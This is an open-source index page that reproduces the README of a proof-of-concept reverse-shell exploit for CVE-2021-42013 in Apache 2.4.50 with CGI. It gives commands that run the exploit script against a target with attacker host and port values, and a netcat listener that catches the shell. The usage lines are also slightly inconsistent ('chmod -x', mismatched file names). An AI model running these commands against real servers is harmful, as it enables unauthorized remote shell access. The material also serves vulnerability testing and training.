Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell

PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell

Last synced: 22 days ago
JSON representation

PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI

Awesome Lists containing this project

README

        

# CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
## Usage :

```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

```
### More info:
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
nc -lvnp 9999

```

### References
https://nvd.nist.gov/vuln/detail/CVE-2021-42013



https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013



https://tryhackme.com/room/cve202141773